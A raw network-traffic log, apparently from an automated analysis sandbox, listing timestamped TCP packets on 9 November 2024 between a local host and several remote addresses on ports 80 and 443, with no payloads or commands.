Nov 9, 2024 02:47:36.449776888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449786901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449826002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.449851990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449876070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449887991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449892044 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.449922085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.449922085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449934959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449945927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449956894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.449970961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.449985981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.450011969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.458292007 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.458643913 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.458657026 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.460391998 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.460457087 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.460903883 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.461144924 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.537311077 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.538090944 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.538106918 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.538666964 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.538671970 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.581202030 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.582281113 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.582298040 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.582906008 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.582912922 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.586947918 CET	53010	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.587125063 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.587136030 CET	443	53064	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.589802027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.595427990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.601680994 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.602933884 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.602952957 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.603902102 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.603908062 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.666358948 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.666418076 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.666610956 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.666847944 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.666847944 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.666856050 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.666863918 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.670866013 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.670880079 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.670968056 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.671150923 CET	53073	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.671163082 CET	443	53073	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.711944103 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.712591887 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.712771893 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.713560104 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.713574886 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.713639975 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.713645935 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.716901064 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.716918945 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.717008114 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.717175007 CET	53074	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.717185020 CET	443	53074	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.733506918 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.733571053 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.733649015 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.733824015 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.733834028 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.733897924 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.733902931 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.737040043 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.737060070 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.737123013 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.737309933 CET	53075	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.737323046 CET	443	53075	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.759763956 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.761657953 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.761672974 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.762362957 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.762367964 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.777256966 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.779068947 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.779078960 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.780225992 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.780316114 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.783267975 CET	53064	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.785770893 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.785856009 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.809516907 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.810791016 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.810802937 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.811463118 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.811469078 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.822360992 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.823388100 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.823396921 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.823755026 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.823767900 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.824047089 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.824069023 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.824409008 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.824629068 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.824692965 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.824944973 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.825431108 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.825495005 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.825695038 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.826996088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827002048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827013016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827018976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827023983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827070951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827114105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827133894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827162981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827176094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827369928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827383041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827389002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827394962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827400923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827406883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827419043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827435017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827469110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827493906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827553988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827600002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827605963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827605963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827615023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827647924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827661991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827668905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827681065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827687025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827692986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827706099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827712059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.827716112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.827749968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828027010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828032970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828044891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828049898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828083992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828097105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828108072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828113079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828114986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828123093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828139067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828141928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828145027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828154087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828157902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828169107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828181028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828187943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828188896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828193903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828208923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828229904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828231096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828238010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828243017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828248024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828283072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828547955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828553915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828566074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828587055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828598022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828603983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828615904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828623056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828634024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828639030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828639984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828646898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828653097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828664064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828669071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828672886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828675032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828680992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828696012 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828697920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828713894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828720093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828722000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828727007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828735113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828739882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828747988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828762054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828768015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828772068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828773022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828780890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828792095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828798056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828818083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828824043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828826904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828830957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828836918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828845978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828857899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828864098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828875065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828877926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828906059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.828918934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828926086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828938007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.828968048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829013109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829027891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829041004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829047918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829091072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829231024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829241037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829246044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829257011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829263926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829277039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829283953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829292059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829308987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829334021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829396009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829413891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829421997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829454899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829462051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829464912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829480886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829513073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829559088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829571009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829577923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829590082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829596996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829610109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829617023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829621077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829624891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829627037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.829644918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.829667091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.847050905 CET	53009	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:36.847063065 CET	443	53009	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:36.848027945 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.862104893 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.862118006 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.863090992 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.863157988 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.867330074 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.867332935 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.867609978 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.867665052 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.867968082 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.867974043 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.894655943 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.894695997 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.894748926 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.894778967 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.894809961 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.900824070 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.900824070 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.900842905 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.900852919 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.913893938 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.913913965 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.914180994 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.916924953 CET	53076	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.916938066 CET	443	53076	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.941004038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941011906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941024065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941092014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941095114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941098928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941112041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941123962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941133022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941138029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941160917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941193104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941199064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941205978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941217899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941257954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941293955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941301107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941313028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941318989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941332102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941337109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941349030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941366911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941452026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941457987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941472054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941495895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941519022 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941531897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941539049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941549063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941580057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941658020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941663980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941677094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941720009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941723108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941726923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941739082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941772938 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941796064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941801071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941845894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.941853046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941859961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.941903114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942003965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942009926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942022085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942028046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942064047 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942080975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.942141056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942147017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942163944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.942167997 CET	80	52982	77.220.212.32	192.168.2.7
